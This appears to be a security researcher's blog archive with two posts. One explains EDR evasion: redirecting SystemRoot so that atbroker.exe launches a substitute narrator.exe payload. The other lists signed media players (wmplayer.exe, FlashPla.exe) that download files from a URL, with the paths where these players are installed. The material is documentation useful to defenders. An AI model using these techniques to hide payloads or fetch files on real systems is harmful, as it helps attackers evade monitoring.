Category Archives: Anti-Forensics

Running programs via Proxy & jumping on a EDR-bypass trampoline, Part 4

Posted on by

Here’s yet another subclass of tricks one can use to distort the process tree seen by EDR and sandbox solutions.

Many Windows programs launch other internal Windows programs (native to OS). They do so carefully so they typically launch them from %SystemRoot%. Many of them use GetSystemDirectory to build a path, but there are still quite a few that rely on an environment variable – they need to use an ExpandEnvironmentStrings API to obtain the actual path.

Changing that environmental variable and copying the required files to a redirected location while replacing the target application enables us to launch a payload of choice making it look like it was executed by a signed binary.

Example:

In this old post I mentioned AtBroker. When you launch it from a command line without any arguments it will simply launch Narrator.exe.

We can:

  • create a test folder
  • change the SystemRoot to point to it
  • copy all the necessary files from the original system32 and Registration folder (procmon helps)
  • launch atbroker.exe
  • the narrator.exe payload will be executed

This launches C:\Test\System32\Narrator.exe:

Downloading off the land

Posted on by

There are many documented ways to use legitimate applications to download stuff from the net.

Here are two more:

  • wmplayer.exe <URL>
  • FlashPla.exe <URL>

when executed they will download the file pointed by URLs, save them to the browser cache folder e.g. %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache\IE, and .. fail playing them as media.

But the files will remain on the system…

The first one is a pretty obvious one –  it’s just a Windows Media Player and it’s present natively on many systems.

The second one – FlashPla.exe – is your good ol’ Adobe Flash Player; you will find it all over the place as it’s being shipped with many drivers and tools accompanying various peripheral devices. It may not be called FlashPla (another name I came across is CL_Gallery.exe, FlashPlayer.exe, cs3flashplayer.exe,SAFlashPlayer.exe), but it’s pretty easy to find.

Example locations:

  • c:\Program Files (x86)\CyberLink\Power2Go\Gallery\CL_Gallery.exe
  • c:\Program Files (x86)\HP\Digital Imaging\help\player\FlashPla.exe
  • C:\Program Files\HP\Digital Imaging\help\player\FlashPla.exe
  • C:\ProgramData\LG\LG LIP2230\Help\flash\FlashPla.exe
  • C:\Program Files\Macromedia\Flash 5\Players\FlashPla.exe
  • C:\Program Files\FlashJester\Jugglor v30\Projector Files\CS3FlashPlayer.exe

Both players open windows and are pretty noisy (e.g. in Registry), but it’s always worth documenting the possibilities…